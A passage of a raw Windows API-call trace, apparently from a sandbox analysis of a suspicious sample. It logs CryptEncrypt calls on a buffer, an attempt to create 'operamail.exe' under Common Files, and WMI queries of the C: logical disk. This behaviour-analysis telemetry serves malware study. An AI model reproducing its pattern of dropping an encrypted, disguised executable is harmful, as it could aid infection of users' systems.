dwFlags=0x0, phKey=0x6bcee3c | out: phKey=0x6bcee3c*=0x77abf0) returned 1 [0167.091] CryptContextAddRef (hProv=0x7a8870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.091] CryptSetKeyParam (hKey=0x77abf0, dwParam=0x4, pbData=0x37ad2cc*=0x1, dwFlags=0x0) returned 1 [0167.091] CryptSetKeyParam (hKey=0x77abf0, dwParam=0x1, pbData=0x37ad298, dwFlags=0x0) returned 1 [0167.091] CryptEncrypt (in: hKey=0x77abf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37ad2dc*, pdwDataLen=0x6bceea8*=0x13a10, dwBufLen=0x13a10 | out: pbData=0x37ad2dc*, pdwDataLen=0x6bceea8*=0x13a10) returned 1 [0167.092] CryptEncrypt (in: hKey=0x77abf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0d10*, pdwDataLen=0x6bceeb0*=0x0, dwBufLen=0x10 | out: pbData=0x37c0d10*, pdwDataLen=0x6bceeb0*=0x10) returned 1 [0167.096] CryptDestroyKey (hKey=0x77b3f0) returned 1 [0167.097] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0167.097] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0167.097] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\operamail.exe", nBufferLength=0x105, lpBuffer=0x6bce920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\operamail.exe", lpFilePart=0x0) returned 0x2b [0167.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee14) returned 1 [0167.097] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\operamail.exe" (normalized: "c:\\program files\\common files\\operamail.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0167.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcdc50) returned 1 [0167.100] CoTaskMemAlloc (cb=0x20c) returned 0x7b3f80 [0167.100] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b3f80 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0167.100] CoTaskMemFree (pv=0x7b3f80) [0167.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6bce908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0167.100] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcee50 | out: ppv=0x6bcee50*=0x72015c) returned 0x0 [0167.100] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcee48 | out: pAptType=0x6bcee48*=1) returned 0x0 [0167.101] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcee4c | out: ppvObject=0x6bcee4c*=0x0) returned 0x80004002 [0167.101] IUnknown:Release (This=0x72015c) returned 0x1 [0167.102] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce7b8 | out: ppv=0x6bce7b8*=0x6737360) returned 0x0 [0167.102] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737360, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce9d0 | out: ppvObject=0x6bce9d0*=0x0) returned 0x80004002 [0167.102] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737360, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce9e4 | out: ppvObject=0x6bce9e4*=0x6733d50) returned 0x0 [0167.102] WbemDefPath:IUnknown:Release (This=0x6737360) returned 0x0 [0167.102] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733d50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce604 | out: ppvObject=0x6bce604*=0x6733d50) returned 0x0 [0167.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733d50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce5c0 | out: ppvObject=0x6bce5c0*=0x0) returned 0x80004002 [0167.103] WbemDefPath:IUnknown:AddRef (This=0x6733d50) returned 0x3 [0167.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733d50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcdf1c | out: ppvObject=0x6bcdf1c*=0x0) returned 0x80004002 [0167.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733d50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdecc | out: ppvObject=0x6bcdecc*=0x0) returned 0x80004002 [0167.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733d50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcded8 | out: ppvObject=0x6bcded8*=0x7ae4c0) returned 0x0 [0167.103] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae4c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdee0 | out: pCid=0x6bcdee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0167.103] WbemDefPath:IUnknown:Release (This=0x7ae4c0) returned 0x3 [0167.103] CoGetContextToken (in: pToken=0x6bcdf38 | out: pToken=0x6bcdf38) returned 0x0 [0167.104] CoGetContextToken (in: pToken=0x6bce340 | out: pToken=0x6bce340) returned 0x0 [0167.104] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733d50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce3d0 | out: ppvObject=0x6bce3d0*=0x0) returned 0x80004002 [0167.104] WbemDefPath:IUnknown:Release (This=0x6733d50) returned 0x2 [0167.104] WbemDefPath:IUnknown:Release (This=0x6733d50) returned 0x1 [0167.104] CoGetContextToken (in: pToken=0x6bcecc8 | out: pToken=0x6bcecc8) returned 0x0 [0167.104] CoGetContextToken (in: pToken=0x6bcec28 | out: pToken=0x6bcec28) returned 0x0 [0167.105] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733d50, riid=0x6bcecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcecf4 | out: ppvObject=0x6bcecf4*=0x6733d50) returned 0x0 [0167.105] WbemDefPath:IUnknown:AddRef (This=0x6733d50) returned 0x3 [0167.105] WbemDefPath:IUnknown:Release (This=0x6733d50) returned 0x2 [0167.105] WbemDefPath:IWbemPath:SetText (This=0x6733d50, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.105] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733d50, puCount=0x6bcee7c | out: puCount=0x6bcee7c*=0x0) returned 0x0 [0167.105] WbemDefPath:IWbemPath:GetText (in: This=0x6733d50, lFlags=2, puBuffLength=0x6bcee78*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee78*=0x20, pszText=0x0) returned 0x0 [0167.105] WbemDefPath:IWbemPath:GetText (in: This=0x6733d50, lFlags=2, puBuffLength=0x6bcee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.105] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733d50, uRequestedInfo=0x0, puResponse=0x6bcee84 | out: puResponse=0x6bcee84*=0xc19) returned 0x0 [0167.105] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733d50, puCount=0x6bcee7c | out: puCount=0x6bcee7c*=0x0) returned 0x0 [0167.105] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733d50, uRequestedInfo=0x0, puResponse=0x6bcee84 | out: puResponse=0x6bcee84*=0xc19) returned 0x0 [0167.106] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733d50, uRequestedInfo=0x0, puResponse=0x6bcee84 | out: puResponse=0x6bcee84*=0xc19) returned 0x0 [0167.106] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733d50, puCount=0x6bcedfc | out: puCount=0x6bcedfc*=0x0) returned 0x0 [0167.106] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6bcede8 | out: puCount=0x6bcede8*=0x2) returned 0x0 [0167.106] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bcede4*=0x0, pszText=0x0 | out: puBuffLength=0x6bcede4*=0xf, pszText=0x0) returned 0x0 [0167.106] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bcede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.106] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bced98 | out: ppv=0x6bced98*=0x72015c) returned 0x0 [0167.106] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bced90 | out: pAptType=0x6bced90*=1) returned 0x0 [0167.106] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bced94 | out: ppvObject=0x6bced94*=0x0) returned 0x80004002 [0167.106] IUnknown:Release (This=0x72015c) returned 0x1 [0167.108] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce700 | out: ppv=0x6bce700*=0x6737380) returned 0x0 [0167.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737380, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce918 | out: ppvObject=0x6bce918*=0x0) returned 0x80004002 [0167.108] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737380, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce92c | out: ppvObject=0x6bce92c*=0x6733dc0) returned 0x0 [0167.108] WbemDefPath:IUnknown:Release (This=0x6737380) returned 0x0 [0167.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733dc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce54c | out: ppvObject=0x6bce54c*=0x6733dc0) returned 0x0 [0167.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733dc0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce508 | out: ppvObject=0x6bce508*=0x0) returned 0x80004002 [0167.109] WbemDefPath:IUnknown:AddRef (This=0x6733dc0) returned 0x3 [0167.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733dc0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcde64 | out: ppvObject=0x6bcde64*=0x0) returned 0x80004002 [0167.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733dc0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcde14 | out: ppvObject=0x6bcde14*=0x0) returned 0x80004002 [0167.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733dc0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcde20 | out: ppvObject=0x6bcde20*=0x7ae410) returned 0x0 [0167.109] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae410, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcde28 | out: pCid=0x6bcde28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0167.109] WbemDefPath:IUnknown:Release (This=0x7ae410) returned 0x3 [0167.109] CoGetContextToken (in: pToken=0x6bcde80 | out: pToken=0x6bcde80) returned 0x0 [0167.110] CoGetContextToken (in: pToken=0x6bce288 | out: pToken=0x6bce288) returned 0x0 [0167.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733dc0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce318 | out: ppvObject=0x6bce318*=0x0) returned 0x80004002 [0167.110] WbemDefPath:IUnknown:Release (This=0x6733dc0) returned 0x2 [0167.110] WbemDefPath:IUnknown:Release (This=0x6733dc0) returned 0x1 [0167.110] CoGetContextToken (in: pToken=0x6bcec10 | out: pToken=0x6bcec10) returned 0x0 [0167.110] CoGetContextToken (in: pToken=0x6bceb70 | out: pToken=0x6bceb70) returned 0x0 [0167.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733dc0, riid=0x6bcec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcec3c | out: ppvObject=0x6bcec3c*=0x6733dc0) returned 0x0 [0167.110] WbemDefPath:IUnknown:AddRef (This=0x6733dc0) returned 0x3 [0167.110] WbemDefPath:IUnknown:Release (This=0x6733dc0) returned 0x2 [0167.110] WbemDefPath:IWbemPath:SetText (This=0x6733dc0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0167.110] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733dc0, puCount=0x6bcedc0 | out: puCount=0x6bcedc0*=0x2) returned 0x0 [0167.110] WbemDefPath:IWbemPath:GetText (in: This=0x6733dc0, lFlags=4, puBuffLength=0x6bcedbc*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedbc*=0xf, pszText=0x0) returned 0x0 [0167.110] WbemDefPath:IWbemPath:GetText (in: This=0x6733dc0, lFlags=4, puBuffLength=0x6bcedbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcedbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.111] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcedc0 | out: ppv=0x6bcedc0*=0x72015c) returned 0x0 [0167.111] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcedb8 | out: pAptType=0x6bcedb8*=1) returned 0x0 [0167.111] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcedbc | out: ppvObject=0x6bcedbc*=0x0) returned 0x80004002 [0167.111] IUnknown:Release (This=0x72015c) returned 0x1 [0167.112] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce9e0 | out: ppv=0x6bce9e0*=0x673d138) returned 0x0 [0167.112] WbemLocator:IUnknown:QueryInterface (in: This=0x673d138, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bcebf8 | out: ppvObject=0x6bcebf8*=0x0) returned 0x80004002 [0167.112] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d138, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcec0c | out: ppvObject=0x6bcec0c*=0x6737390) returned 0x0 [0167.112] WbemLocator:IUnknown:Release (This=0x673d138) returned 0x0 [0167.112] WbemLocator:IUnknown:QueryInterface (in: This=0x6737390, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce82c | out: ppvObject=0x6bce82c*=0x6737390) returned 0x0 [0167.113] WbemLocator:IUnknown:QueryInterface (in: This=0x6737390, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce7e8 | out: ppvObject=0x6bce7e8*=0x0) returned 0x80004002 [0167.113] WbemLocator:IUnknown:AddRef (This=0x6737390) returned 0x3 [0167.113] WbemLocator:IUnknown:QueryInterface (in: This=0x6737390, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce144 | out: ppvObject=0x6bce144*=0x0) returned 0x80004002 [0167.113] WbemLocator:IUnknown:QueryInterface (in: This=0x6737390, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce0f4 | out: ppvObject=0x6bce0f4*=0x0) returned 0x80004002 [0167.113] WbemLocator:IUnknown:QueryInterface (in: This=0x6737390, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce100 | out: ppvObject=0x6bce100*=0x0) returned 0x80004002 [0167.113] CoGetContextToken (in: pToken=0x6bce160 | out: pToken=0x6bce160) returned 0x0 [0167.114] CoGetContextToken (in: pToken=0x6bce568 | out: pToken=0x6bce568) returned 0x0 [0167.114] WbemLocator:IUnknown:QueryInterface (in: This=0x6737390, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce5f8 | out: ppvObject=0x6bce5f8*=0x0) returned 0x80004002 [0167.114] WbemLocator:IUnknown:Release (This=0x6737390) returned 0x2 [0167.114] WbemLocator:IUnknown:Release (This=0x6737390) returned 0x1 [0167.114] CoGetContextToken (in: pToken=0x6bcebd8 | out: pToken=0x6bcebd8) returned 0x0 [0167.114] CoGetContextToken (in: pToken=0x6bceb38 | out: pToken=0x6bceb38) returned 0x0 [0167.114] WbemLocator:IUnknown:QueryInterface (in: This=0x6737390, riid=0x6bcec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6bcec04 | out: ppvObject=0x6bcec04*=0x6737390) returned 0x0 [0167.115] WbemLocator:IUnknown:AddRef (This=0x6737390) returned 0x3 [0167.115] WbemLocator:IUnknown:Release (This=0x6737390) returned 0x2 [0167.115] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733dc0, puCount=0x6bced9c | out: puCount=0x6bced9c*=0x2) returned 0x0 [0167.115] WbemDefPath:IWbemPath:GetText (in: This=0x6733dc0, lFlags=8, puBuffLength=0x6bced98*=0x0, pszText=0x0 | out: puBuffLength=0x6bced98*=0xf, pszText=0x0) returned 0x0 [0167.115] WbemDefPath:IWbemPath:GetText (in: This=0x6733dc0, lFlags=8, puBuffLength=0x6bced98*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.115] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6bcec74 | out: ppv=0x6bcec74*=0x67373a0) returned 0x0 [0167.115] WbemLocator:IWbemLocator:ConnectServer (in: This=0x67373a0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6bced08 | out: ppNamespace=0x6bced08*=0x6747f4c) returned 0x0 [0174.586] WbemLocator:IUnknown:QueryInterface (in: This=0x6747f4c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceba4 | out: ppvObject=0x6bceba4*=0x781f94) returned 0x0 [0174.586] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781f94, pProxy=0x6747f4c, pAuthnSvc=0x6bcebf4, pAuthzSvc=0x6bcebf0, pServerPrincName=0x6bcebe8, pAuthnLevel=0x6bcebec, pImpLevel=0x6bcebdc, pAuthInfo=0x6bcebe0, pCapabilites=0x6bcebe4 | out: pAuthnSvc=0x6bcebf4*=0xa, pAuthzSvc=0x6bcebf0*=0x0, pServerPrincName=0x6bcebe8, pAuthnLevel=0x6bcebec*=0x6, pImpLevel=0x6bcebdc*=0x2, pAuthInfo=0x6bcebe0, pCapabilites=0x6bcebe4*=0x1) returned 0x0 [0174.586] WbemLocator:IUnknown:Release (This=0x781f94) returned 0x1 [0174.586] WbemLocator:IUnknown:QueryInterface (in: This=0x6747f4c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb98 | out: ppvObject=0x6bceb98*=0x781fb4) returned 0x0 [0174.586] WbemLocator:IUnknown:QueryInterface (in: This=0x6747f4c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb94 | out: ppvObject=0x6bceb94*=0x781f94) returned 0x0 [0174.586] WbemLocator:IClientSecurity:SetBlanket (This=0x781f94, pProxy=0x6747f4c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0174.587] WbemLocator:IUnknown:Release (This=0x781f94) returned 0x2 [0174.587] WbemLocator:IUnknown:Release (This=0x781fb4) returned 0x1 [0174.587] CoTaskMemFree (pv=0x77e118) [0174.587] WbemLocator:IUnknown:Release (This=0x67373a0) returned 0x0 [0174.587] WbemLocator:IUnknown:QueryInterface (in: This=0x6747f4c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce794 | out: ppvObject=0x6bce794*=0x781fb4) returned 0x0 [0174.587] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce750 | out: ppvObject=0x6bce750*=0x0) returned 0x80004002 [0174.588] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, 